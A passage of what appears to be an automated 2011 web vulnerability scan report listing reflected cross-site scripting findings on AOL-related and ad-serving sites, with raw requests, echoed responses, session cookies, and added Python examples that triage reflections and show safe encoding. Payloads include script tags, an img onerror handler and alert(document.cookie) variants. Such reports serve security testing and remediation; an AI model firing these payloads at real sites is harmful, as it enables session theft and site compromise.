Cookie: VINDICOSUITEAUDIENCE=%7B%22PL%22%3A%7B%223BBC8FBC%2DC6A8%2D43A6%2DB65C%2D2405955B79FE%22%3A%7B%2253398251%2DC5D1%2D4466%2D84FA%2D7CEE6AF3F691%22%3A%221295658149%22%7D%7D%7D; VINDICOAUDIENCEISSUEDIDENTITY=10aa51b8-16d7-4be9-8b5a-488ee3c949fc; vpp=10aa51b8-16d7-4be9-8b5a-488ee3c949fc; 10aa51b8-16d7-4be9-8b5a-488ee3c949fc={1296137382377:InstreamImpression_0:6146|14|2080|45439|14942|33453|10|2204:2}{1296137388154:InstreamImpression_25:6146|14|2080|45439|14942|33453|10|2204:2}{1296137389177:InstreamImpression_50:6146|14|2080|45439|14942|33453|10|2204:2}{1296137394130:InstreamImpression_75:6146|14|2080|45439|14942|33453|10|2204:2}{1296137398881:InstreamImpression_100:6146|14|2080|45439|14942|33453|10|2204:1}{1296749649702:InstreamImpression_0:5745|413|1574|42244|14160|30521|868|2293:1}; 10aa51b8-16d7-4be9-8b5a-488ee3c949fc_vpp={1296137382377:InstreamImpression_0:6146|14|2080|45439|14942|33453|10|2204:2}{1296137388154:InstreamImpression_25:6146|14|2080|45439|14942|33453|10|2204:2}{1296137389177:InstreamImpression_50:6146|14|2080|45439|14942|33453|10|2204:2}{1296137394130:InstreamImpression_75:6146|14|2080|45439|14942|33453|10|2204:2}{1296137398881:InstreamImpression_100:6146|14|2080|45439|14942|33453|10|2204:1}{1296749649702:InstreamImpression_0:5745|413|1574|42244|14160|30521|868|2293:1}

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Date: Sun, 06 Feb 2011 20:38:07 GMT
Expires: Sun, 06 Feb 2011 20:38:07 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: ASPSESSIONIDQSDSSCBB=AMKDELMCPLOBBHMIPCAAEIPL; path=/
X-Powered-By: ASP.NET
Content-Length: 999
Connection: keep-alive

<br>Error Description:Incorrect syntax near 'f6c5'.<br>SQL:[Track_BannerCreativeImpression_V.1] @siteId = 1804, @bannerCreativeAdModuleId = 20031, @campaignId = 6035, @syndicationOutletId = 444182f6c5<script>alert(1)</script>9b9dc606334, @adrotationId = 14567, @ipAddress = '173.193.214.243', @sessionId = '750039461', @pixel = '0', @ipNumber = '2915161843', @referer = 'http://www.cbs.com/primetime/big_bang_theory/video/?4c0f6%22-alert
...[SNIP]...

1.226. http://web.lightningcast.net/servlets/getPlaylist [uid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://web.lightningcast.net
Path:   /servlets/getPlaylist

Issue detail

The value of the uid request parameter is copied into the response. The payload 30f97<script>alert(1)</script>daaff63cbfb was submitted in the uid parameter. This input was echoed unmodified in the application's response.

The scanner classifies this as plain text between tags and rates the proof of concept as certain, but the response shown below does not support that reading: the echo lands inside a double-quoted attribute value (<meta name="uuid" content="...">), the payload contains no double quote that would close that attribute, and the body is served as Content-Type application/smil rather than as HTML. The unencoded reflection is real and should be fixed, but exploitability has to be confirmed manually: a payload would need to close the attribute, and something would need to render this playlist as HTML for the script to run.

Request

GET /servlets/getPlaylist?ver=2.0&client=fcas3_1.12.2.2.BETA.AOL&fv=WIN%2010,1,103,22&attr=[Domain,fanhouse.com][Autoplay,false][adamid,none]&baudit=server&tname=AutoplayOff&crlen=t&nwid=278524&content=NO_VIDEO_URL&format=Video-Flash-400-400x300&regions=StandardBanner&uid=95293821230f97<script>alert(1)</script>daaff63cbfb&level=Sports:nfl&audit=param&resp=SMIL&pu=http%3A//www.fanhouse.com/%3Ff9308%2522-alert%28document.cookie%29-%2522caa87257aff%3D1 HTTP/1.1
Host: web.lightningcast.net
Proxy-Connection: keep-alive
Referer: http://c.brightcove.com/services/viewer/federated_f9?&width=300&height=295&flashID=myaolExperience&bgcolor=%23FFFFFF&playerID=43942763001&publisherID=1612833736&isVid=true&isUI=true&autoStart=false&%40videoList=64092604001&wmode=transparent
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 20:39:47 GMT
Server: Apache/2.2.6 (Fedora)
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Expires: -1
Connection: close
P3P: policyref="http://web.lightningcast.net/w3c/p3p.xml",CP="NON DSP COR CURa TAIo PSDo OUR IND PHY DEM STA LOC"
Content-Type: application/smil
Content-Length: 757

<smil xmlns:lc="http://web.lightningcast.com/2006/SMIL20/Language"
title="AOL US Playlist">
   <head>
       <meta name="template" content="AutoplayOff (98652) - v5"/>
       <meta name="gpserver" content="ntc-d
...[SNIP]...
<meta name="uuid" content="95293821230f97<script>alert(1)</script>daaff63cbfb"/>
...[SNIP]...

1.227. http://webcenter.polls.aol.com/modular.jsp [template parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://webcenter.polls.aol.com
Path:   /modular.jsp

Issue detail

The value of the template request parameter is copied into the HTML document as plain text between tags. The payload ff2c5<script>alert(1)</script>dafbfb81510 was submitted in the template parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /modular.jsp?template=1386ff2c5<script>alert(1)</script>dafbfb81510&view=190752&pollId=191044&a... HTTP/1.1
Host: webcenter.polls.aol.com
Proxy-Connection: keep-alive
Referer: http://www.fanhouse.com/?f9308%22-alert(document.cookie)-%22caa87257aff=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|269781FA051D367C-60000130A002AC5E[CE]; mbox=check#true#1297021767|session#1297021706926-216891#1297023568|PC#1297021706926-216891.17#1298231321; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.59ff; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.59ff; bandType=broadband; s_pers=%20s_getnr%3D1297023688615-Repeat%7C1360095688615%3B%20s_nrgvo%3DRepeat%7C1360095688616%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Daolcomqadev%252Cdevaolsvc%253D%252526pid%25253Dundefined%25252520%2525253A%25252520%2525255BUndefined%25252520Page%25252520Name%2525255D%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//about.aol.com/sitemap/%252526ot%25253DA%3B

Response

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 20:39:51 GMT
Server: Apache/2.0.59 (Unix) mod_ssl/2.0.59 OpenSSL/0.9.7i mod_rsp20/RSP_Plugins_v8_r3.05-12-09:mod_rsp20_large.so.rhe-4-x86.v8_r3.40 mod_jk/1.2.19
Set-Cookie: RSP_DAEMON=9e1d6d50428084a60e4f8ab55a65a11f; path=/; HttpOnly
P3P: CP="PHY ONL PRE STA CURi OUR IND"
Set-Cookie: JSESSIONID=4FBABB732C7B849F548765FCBEDF26F7; Path=/
Cache-Control: no-cache, no-store, must-revalidate
Pragma: no-cache
Last-Modified: Sun, 06 Feb 2011 20:39:51 GMT
Expires: 0
Cteonnt-Length: 161
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 161

/oap/polls/ui/webapps/xsl/q1386ff2c5<script>alert(1)</script>dafbfb81510.xslt (No such file or directory)



1.228. http://www.aisledash.com/ [3418b%22%3E%3Cscript%3Ealert(String.fromCharCode(88,83,83))%3C/script%3E3224aeef255 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.aisledash.com
Path:   /

Issue detail

The value of the 3418b%22%3E%3Cscript%3Ealert(String.fromCharCode(88,83,83))%3C/script%3E3224aeef255 request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 20f0d"><script>alert(1)</script>6f15c085aa8 was submitted in the 3418b%22%3E%3Cscript%3Ealert(String.fromCharCode(88,83,83))%3C/script%3E3224aeef255 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?3418b%22%3E%3Cscript%3Ealert(String.fromCharCode(88,83,83))%3C/script%3E3224aeef255=120f0d"><script>alert(1)</script>6f15c085aa8 HTTP/1.1
Host: www.aisledash.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_pers=%20s_getnr%3D1297023866964-New%7C1360095866964%3B%20s_nrgvo%3DNew%7C1360095867077%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.73bc; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.73bc

Response

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 20:24:02 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Content-Type: text/html
Content-Length: 51781

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:og="h
...[SNIP]...
<link rel="canonical" href="http://www.aisledash.com/?3418b%22%3E%3Cscript%3Ealert(String.fromCharCode(88,83,83))%3C/script%3E3224aeef255=120f0d"><script>alert(1)</script>6f15c085aa8" />
...[SNIP]...

1.229. http://www.aisledash.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.aisledash.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3418b"><script>alert(1)</script>3224aeef255 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?3418b"><script>alert(1)</script>3224aeef255=1 HTTP/1.1
Host: www.aisledash.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 20:15:54 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Keep-Alive: timeout=5, max=999897
Connection: Keep-Alive
Content-Type: text/html
X-Pad: avoid browser bug
Content-Length: 51480

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:og="h
...[SNIP]...
<link rel="canonical" href="http://www.aisledash.com/?3418b"><script>alert(1)</script>3224aeef255=1" />
...[SNIP]...
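Findings 1.224 to 1.229 all rest on the same reasoning: the payload comes back byte for byte, and its position in the markup decides whether it executes. The Python script below is an added example, neither this report's output nor code from any of the sites listed. It re-runs that reasoning offline over fragments copied from the responses above and adds the two checks the scanner skipped in 1.226: whether the body is served as HTML at all, and whether a payload that lands inside a quoted attribute actually closes that attribute. The attribute_encode function is the assumed fix for the canonical-link pattern in 1.228 and 1.229; the sites' real server code is not on this page.

```python
import html

# Fragments copied from this report's findings and embedded as constructed
# inputs: (finding, Content-Type, payload, response line that echoed it).
SAMPLES = [
    ("1.225", "text/html",
     "2f6c5<script>alert(1)</script>9b9dc606334",
     "<br>Error Description:Incorrect syntax near 'f6c5'.<br>SQL:[Track_BannerCreativeImpression_V.1] "
     "@syndicationOutletId = 444182f6c5<script>alert(1)</script>9b9dc606334, @adrotationId = 14567"),
    ("1.226", "application/smil",
     "30f97<script>alert(1)</script>daaff63cbfb",
     '<meta name="uuid" content="95293821230f97<script>alert(1)</script>daaff63cbfb"/>'),
    ("1.229", "text/html",
     '3418b"><script>alert(1)</script>3224aeef255',
     '<link rel="canonical" href="http://www.aisledash.com/?3418b"><script>alert(1)</script>3224aeef255=1" />'),
]

HTML_TYPES = ("text/html", "application/xhtml+xml")


def reflection_context(markup, payload):
    """Where the first verbatim copy of payload sits: 'absent', 'text',
    'attribute' (inside a double-quoted attribute value) or 'tag'.
    Inside an unclosed tag, an odd number of double quotes between the
    '<' and the payload means the payload is within a quoted value."""
    idx = markup.find(payload)
    if idx < 0:
        return "absent"
    tag_open = markup.rfind("<", 0, idx)
    tag_close = markup.rfind(">", 0, idx)
    if tag_open < 0 or tag_close > tag_open:
        return "text"
    return "attribute" if markup.count('"', tag_open, idx) % 2 else "tag"


def is_exploitable(content_type, markup, payload):
    """The scanner's reasoning plus two checks it skipped: the body must be
    rendered as HTML, and a payload inside a quoted attribute must close the
    quote before it can open a tag."""
    if content_type.split(";")[0].strip().lower() not in HTML_TYPES:
        return False
    ctx = reflection_context(markup, payload)
    if ctx == "text":
        return "<" in payload
    if ctx == "attribute":
        return '"' in payload and ">" in payload.split('"', 1)[1]
    return False


def attribute_encode(value):
    """Assumed fix for the canonical-link pattern: HTML-attribute-encode the
    reflected value (quotes included) before interpolating it."""
    return html.escape(value, quote=True)


def triage():
    """Re-run the checks over SAMPLES: {finding: (context, exploitable)}."""
    return {f: (reflection_context(m, p), is_exploitable(ct, m, p))
            for f, ct, p, m in SAMPLES}


if __name__ == "__main__":
    for finding, (ctx, bad) in triage().items():
        print(finding, ctx, "exploitable" if bad else "not exploitable as shown")
    payload = SAMPLES[2][2]
    fixed = '<link rel="canonical" href="http://www.aisledash.com/?%s=1" />' % attribute_encode(payload)
    print("after encoding:", reflection_context(fixed, payload))
```

The classifier deliberately reports "tag" (payload inside a tag but outside any quoted value) as not exploitable; a real triage would treat that position as attribute-name injection and test it separately. After attribute_encode the payload is no longer present verbatim, which is the property the scanner's "echoed unmodified" check keys on. A better fix than encoding is to stop deriving the canonical URL from the raw request string at all and build it from the resolved route.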

1.230. http://www.aolhealth.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.aolhealth.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload efb95"><script>alert(1)</script>2a680ac5448 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?efb95"><script>alert(1)</script>2a680ac5448=1 HTTP/1.1
Host: www.aolhealth.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 20:15:56 GMT
Server: Apache/2.2
Set-Cookie: PHPSESSID=f8dd648892fdb2784a8d4f9f298fb884; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Keep-Alive: timeout=5, max=999986
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 53339

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.
...[SNIP]...
<link rel="canonical" href="http://www.aolhealth.com/?efb95"><script>alert(1)</script>2a680ac5448=1">
...[SNIP]...

1.231. http://www.aolhealth.com/encyclopedia/health/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.aolhealth.com
Path:   /encyclopedia/health/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 65d49"><script>alert(1)</script>6681fd48a3a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /encyclopedia65d49"><script>alert(1)</script>6681fd48a3a/health/ HTTP/1.1
Host: www.aolhealth.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 20:16:00 GMT
Server: Apache/2.2
Set-Cookie: PHPSESSID=fa5c123b6e1b865dbf4ee1f85f003d9e; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Keep-Alive: timeout=5, max=999978
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 42697

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.
...[SNIP]...
<link rel="canonical" href="http://www.aolhealth.com/encyclopedia65d49"><script>alert(1)</script>6681fd48a3a/health/">
...[SNIP]...

1.232. http://www.aolhealth.com/encyclopedia/health/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.aolhealth.com
Path:   /encyclopedia/health/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6f82e"%3b98c2b66b2ac was submitted in the REST URL parameter 2. This input was echoed as 6f82e";98c2b66b2ac in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /encyclopedia/health6f82e"%3b98c2b66b2ac/ HTTP/1.1
Host: www.aolhealth.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 20:16:00 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Set-Cookie: JSESSIONID=1AFFC58ED2FFE914B0FCD00CD146A9D1; Path=/
Keep-Alive: timeout=5, max=98
Connection: Keep-Alive
Content-Length: 58511


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.or
...[SNIP]...
kExternalLinks="true";
s_265.channel="us.health";
s_265.prop1="Condition Center | Health Encyclopedia";
s_265.pfxID="hth";
s_265.prop2="Main";
s_265.prop12="http://www.aolhealth.com/encyclopedia/health6f82e";98c2b66b2ac/";
s_265.prop17="";
s_265.prop18="";
s_265.mmxgo=true;
s_265.disablepihost=false;
s_265.disablepipath=false;
s_265.mmxtitle="Health Encyclopedia Main";
s_265.linkInternalFilters="javascript:,aolhealth
...[SNIP]...

1.233. http://www.aolhealth.com/encyclopedia/health/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.aolhealth.com
Path:   /encyclopedia/health/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f4201</script><a>59aed720f83 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. The reason is that the HTML tokenizer ends a script element at the first </script> it meets, regardless of whether the JavaScript lexer would consider that text to be inside a string literal, so the <a> that follows is parsed as markup. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Where it cannot be avoided, the value must be JavaScript-string-encoded and, in addition, the characters < and > must be escaped (for example as \u003c and \u003e) so that the sequence </script> can never appear in the script body; backslash-escaping quotes alone does not stop the breakout shown here.

Request

GET /encyclopedia/health/?f4201</script><a>59aed720f83=1 HTTP/1.1
Host: www.aolhealth.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 20:15:57 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Set-Cookie: JSESSIONID=F127D8877ADE90704E8E2FF6A6DAE314; Path=/
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Length: 58524


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.or
...[SNIP]...
xternalLinks="true";
s_265.channel="us.health";
s_265.prop1="Condition Center | Health Encyclopedia";
s_265.pfxID="hth";
s_265.prop2="Main";
s_265.prop12="http://www.aolhealth.com/encyclopedia/health/?f4201</script><a>59aed720f83=1";
s_265.prop17="";
s_265.prop18="";
s_265.mmxgo=true;
s_265.disablepihost=false;
s_265.disablepipath=false;
s_265.mmxtitle="Health Encyclopedia Main";
s_265.linkInternalFilters="javascript:,aolhealt
...[SNIP]...
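Findings 1.232 and 1.233 show the two ways a value echoed into the s_265.prop12 JavaScript string can escape: an unescaped double quote ends the literal, and a literal </script> ends the whole script element before the JavaScript is ever parsed. The Python below is an added example, not code from aolhealth.com or from the scanner. The assignment line and the two payloads are copied from the responses above; js_string_naive is an assumed first-attempt fix included to show why quote escaping alone is insufficient, and js_string_safe is the encoding that closes both holes.

```python
import json

# Values copied from findings 1.232 and 1.233 and used as constructed inputs.
PAYLOAD_QUOTE = '6f82e";98c2b66b2ac'
PAYLOAD_SCRIPT_END = 'f4201</script><a>59aed720f83'
URL_TEMPLATE = "http://www.aolhealth.com/encyclopedia/health%s/"


def js_string_raw(value):
    """The pattern the responses show: the URL dropped into a double-quoted
    JavaScript string literal with no encoding at all."""
    return 's_265.prop12="%s";' % value


def js_string_naive(value):
    """Assumed first-attempt fix (not the site's code): backslash-escape the
    quote and backslash only.  The literal stays intact, but a '</script>' in
    the value still closes the script element, because the HTML tokenizer
    ends the script block before the JavaScript lexer ever sees the string."""
    return 's_265.prop12="%s";' % value.replace("\\", "\\\\").replace('"', '\\"')


def js_string_safe(value):
    """JSON-encode the value (quotes, backslashes, control characters and, with
    ensure_ascii, U+2028/U+2029), then also escape the characters the HTML
    tokenizer reacts to so '</script>' cannot appear in the script body."""
    encoded = json.dumps(value, ensure_ascii=True)
    for ch, esc in (("<", "\\u003c"), (">", "\\u003e"), ("&", "\\u0026")):
        encoded = encoded.replace(ch, esc)
    return "s_265.prop12=%s;" % encoded


def render(encoder, payload):
    """Build the assignment line for a request whose REST URL parameter 2
    carries the payload."""
    return encoder(URL_TEMPLATE % payload)


def string_literal_intact(js_line):
    """True if the line still holds one intact double-quoted literal: exactly
    two unescaped quotes and no '</script' anywhere in the script text."""
    unescaped = 0
    i = 0
    while i < len(js_line):
        if js_line[i] == "\\":
            i += 2          # skip the escaped character
            continue
        if js_line[i] == '"':
            unescaped += 1
        i += 1
    return unescaped == 2 and "</script" not in js_line.lower()


if __name__ == "__main__":
    for name, enc in (("raw", js_string_raw), ("naive", js_string_naive), ("safe", js_string_safe)):
        for payload in (PAYLOAD_QUOTE, PAYLOAD_SCRIPT_END):
            line = render(enc, payload)
            print("%-5s %-6s %s" % (name, "ok" if string_literal_intact(line) else "BROKEN", line))
```

Run as a script it prints six lines: raw is broken by both payloads, naive survives the quote payload but not the </script> one, and safe survives both because the angle brackets come out as \u003c and \u003e, which the JavaScript lexer turns back into the original characters only after the HTML tokenizer has finished. Escaping & as well keeps the same value safe if the script block is ever moved into an XHTML document or an attribute.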

1.234. http://www.aolhealth.com/traffic/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.aolhealth.com
Path:   /traffic/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 16acd"><script>alert(1)</script>eb6bf6a9a5f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /traffic16acd"><script>alert(1)</script>eb6bf6a9a5f/?t=js&bv=&os=&tz=&lg=&rv=&rsv=&pw=%2F%3Fefb95%5C%22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E2a680ac5448%3D1%2F&cb=1412981861 HTTP/1.1
Host: www.aolhealth.com
Proxy-Connection: keep-alive
Referer: http://www.aolhealth.com/?efb95%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E2a680ac5448=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=6b8c6d74611ee49286741aa7af24e81b; s_pers=%20s_getnr%3D1297023979342-New%7C1360095979342%3B%20s_nrgvo%3DNew%7C1360095979389%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 20:25:43 GMT
Server: Apache/2.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 43221

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.
...[SNIP]...
<link rel="canonical" href="http://www.aolhealth.com/traffic16acd"><script>alert(1)</script>eb6bf6a9a5f/?t=js&bv=&os=&tz=&lg=&rv=&rsv=&pw=%2F%3Fefb95%5C%22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E2a680ac5448%3D1%2F&cb=1412981861">
...[SNIP]...

1.235. http://www.aolnews.com/story/egypt-regime-offers-new-concessions-to/1550027 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.aolnews.com
Path:   /story/egypt-regime-offers-new-concessions-to/1550027

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1d1d4"><img%20src%3da%20onerror%3dalert(1)>2fa0f835869 was submitted in the REST URL parameter 2. This input was echoed as 1d1d4"><img src=a onerror=alert(1)>2fa0f835869 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /story/egypt-regime-offers-new-concessions-to1d1d4"><img%20src%3da%20onerror%3dalert(1)>2fa0f835869/1550027 HTTP/1.1
Host: www.aolnews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 20:16:16 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Keep-Alive: timeout=5, max=999981
Connection: Keep-Alive
Content-Type: text/html
X-Pad: avoid browser bug
Content-Length: 69413

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol
...[SNIP]...
<meta property="og:url" content="http://www.aolnews.com/story/egypt-regime-offers-new-concessions-to1d1d4"><img src=a onerror=alert(1)>2fa0f835869/1550027" />
...[SNIP]...

1.236. http://www.aolnews.com/story/egypt-regime-offers-new-concessions-to/1550027 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.aolnews.com
Path:   /story/egypt-regime-offers-new-concessions-to/1550027

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e7180"%3bd6f4da479f4 was submitted in the REST URL parameter 2. This input was echoed as e7180";d6f4da479f4 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /story/egypt-regime-offers-new-concessions-toe7180"%3bd6f4da479f4/1550027 HTTP/1.1
Host: www.aolnews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

